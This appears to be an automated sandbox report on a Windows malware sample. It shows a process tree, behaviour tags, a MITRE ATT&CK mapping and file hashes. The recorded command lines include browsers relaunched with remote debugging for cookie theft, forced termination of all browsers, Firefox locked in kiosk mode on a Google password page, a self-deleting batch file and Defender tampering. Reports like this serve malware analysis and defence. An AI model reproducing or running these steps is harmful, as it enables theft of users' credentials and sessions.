C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:13⤵
- Uses browser remote debugging
PID:1500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:13⤵
- Uses browser remote debugging
PID:4552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4300 /prefetch:13⤵
- Uses browser remote debugging
PID:4004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4792,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:83⤵PID:4076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:83⤵PID:2544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:83⤵PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:83⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:83⤵PID:4064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:83⤵PID:3600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5284,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5256 /prefetch:23⤵
- Uses browser remote debugging
PID:4860
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3500 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e05a46f8,0x7ff8e05a4708,0x7ff8e05a47183⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:23⤵PID:1932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:83⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:13⤵
- Uses browser remote debugging
PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:13⤵
- Uses browser remote debugging
PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:13⤵
- Uses browser remote debugging
PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:13⤵
- Uses browser remote debugging
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\IEHJDGIDBA.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4816 -
C:\Users\Admin\Documents\IEHJDGIDBA.exe"C:\Users\Admin\Documents\IEHJDGIDBA.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3756 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 14566⤵
- Program crash
PID:4896
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp843A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp843A.tmp.bat6⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011945001\7d827da348.exe"C:\Users\Admin\AppData\Local\Temp\1011945001\7d827da348.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\1011946001\4caa2bc894.exe"C:\Users\Admin\AppData\Local\Temp\1011946001\4caa2bc894.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\1011947001\befb3070da.exe"C:\Users\Admin\AppData\Local\Temp\1011947001\befb3070da.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 15286⤵
- Program crash
PID:5788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 15606⤵
- Program crash
PID:5812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 15606⤵
- Program crash
PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011948001\8373d2c99b.exe"C:\Users\Admin\AppData\Local\Temp\1011948001\8373d2c99b.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3888
-
-
C:\Users\Admin\AppData\Local\Temp\1011949001\255e8fdf1c.exe"C:\Users\Admin\AppData\Local\Temp\1011949001\255e8fdf1c.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4664 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:5108
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2588 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c92d03d3-5bd3-4826-8330-94a989c1765b} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" gpu8⤵PID:5068
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6868158a-aad4-48e6-a01e-a34d9e9fcac0} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" socket8⤵PID:4456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2880 -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3312 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0ea2aab-dd98-435e-a2a7-64302b20be62} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab8⤵PID:1416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4072 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7051b04b-db35-4de3-9a7b-88685f9880c1} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab8⤵PID:4080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4840 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4832 -prefMapHandle 4828 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61b9619a-61d4-4d4e-81d6-236eb839b578} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" utility8⤵
- Checks processor information in registry
PID:5476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 3 -isForBrowser -prefsHandle 5656 -prefMapHandle 5660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a4a49ed-0de9-40f8-b8cd-04f1ee4684f4} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab8⤵PID:1220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5796 -prefMapHandle 5800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1675a1c4-0603-4abe-99a4-26c8c6c59e2e} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab8⤵PID:1260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 5 -isForBrowser -prefsHandle 5980 -prefMapHandle 5984 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e101b31f-71c4-4694-b855-b7bf2d56f76e} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab8⤵PID:4240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011950001\38a103eec7.exe"C:\Users\Admin\AppData\Local\Temp\1011950001\38a103eec7.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\1011951001\rhnew.exe"C:\Users\Admin\AppData\Local\Temp\1011951001\rhnew.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:408
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3540 -ip 35401⤵PID:2308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2824 -ip 28241⤵PID:5740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2824 -ip 28241⤵PID:5752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2824 -ip 28241⤵PID:5764
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
649B
MD5f7274d853dd03c643d39cf8104c5030e
SHA1c33a7e4a53969a7ca2725c0586c80c1fdd70f9fe
SHA2563419a0cf1f4befeb0a15b74fda63d7c37a132c1cd527026773a93b8da88a5a1d
SHA5120e9f44554f78bf8d56f7a90d8623c21974bb2eec56d3908ef32bed44c7bad69247cd33de48b2cfbac3dd46d236ca7edbf9c7ce3428073c59b0c207af02b6a147
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3d6890fb-a1c7-41e3-b739-877f8735c2e6.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\94b150ca-959a-4fbe-a721-f1fb1c437fe7.tmp
Filesize5KB
MD586d98c315dca7096e51f1f709c1c3b32
SHA18d47dffb5a4e4efb5a0ba026d3aff944b5c55d12
SHA25624092cfda0f9cc0daa232c404cb5a17b1eddefa9d6101dd382077c55edd9eda5
SHA512a4299b76dc99e4b9ff9f2314ebff7d39b50ac3c8d3d3d9acd1ac23bb78b9828097e8bb256f13000c5b651b7c419444ba6fef2d3f29ab2bc29c77cf601fd4e949
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json
Filesize22KB
MD5a028e7f7355a7e7e04ecd57b34ca10b0
SHA17b534b6940a8b0a5300ce67c2a691d4e94b31b44
SHA256a6c781e404153faab771f21cf9cb748f41a3f6a984f7916403772c053ae155f6
SHA5123f8dc40d33cdcf173bd2f29842d646020f1d9133d0fa8e62d2cb9bbb8a4cd13b41642a1f86627995991cbde4e9e19f72d6661c23b41fb658e9964bda30a038d3
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
5.0MB
MD571c8588c96e879748f4c320c9b4aeec2
SHA19a5baa7e9b1c6b8b5d3ff674dcae22ae017d8447
SHA256a4bb60772446f2cd2f7629574bbf5702c35ce2afcf6e4b3a3d157281cecc7234
SHA5128ab113c203eab23f4969b45ec4cc3c383e402f5a32dea035032e340bf8b9aacf5c734c259419ebb146cf2426b1f944032ce944cb2d9714255907989f260c5a0e
-
Filesize
5.6MB
MD520c1c110a69ba6dc9fb55a1186334290
SHA17b35f156d8ef02936af990349d35efd7146380f2
SHA2567d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29
SHA51208eb3ff63e09c6d236ceac3c006c844c48f283c266e8b3fa25ec1ee04d2eca49ec4788534e1ee55749de5ad89ddfa0dbbafa4eb9f30f35cdd783da08a2ad5d10
-
Filesize
1.9MB
MD5b00fddad7146360a79dc9f44a551a845
SHA1137a9e351a0216710004634997c78be7a7c85217
SHA256cead013e2c3a7335e5945972ecd71d9d0b9a2deec418a3fa693763320c22b212
SHA5122e43566eeda5d000c3d6855d096a3f6033b3cbc583c7c83bd6afd3b3c767474a295e810b718a6cb97b2144ab75f2223c1ddd988ca8f2f893982e8d8621c7f85c
-
Filesize
4.3MB
MD5be76a09e036f57326d7fd559412016b9
SHA1aa71c0a9e30080d9b5660427a3177399743dff94
SHA256b0194d131df2a6546ec420e3415e30650886515f1fbb73ba3f99029c1f3e31a3
SHA5128a003c02b74b77b505cac7f07076bbc9ed47a298697a73ff14d70048e712eee57d5f3ed53bbc178f82f2a3a4a6c39cc23da93e2da5ff89e2fcb960cd23b554cb
-
Filesize
1.8MB
MD52effdee9fcf18bb6a2c2758b1f83b272
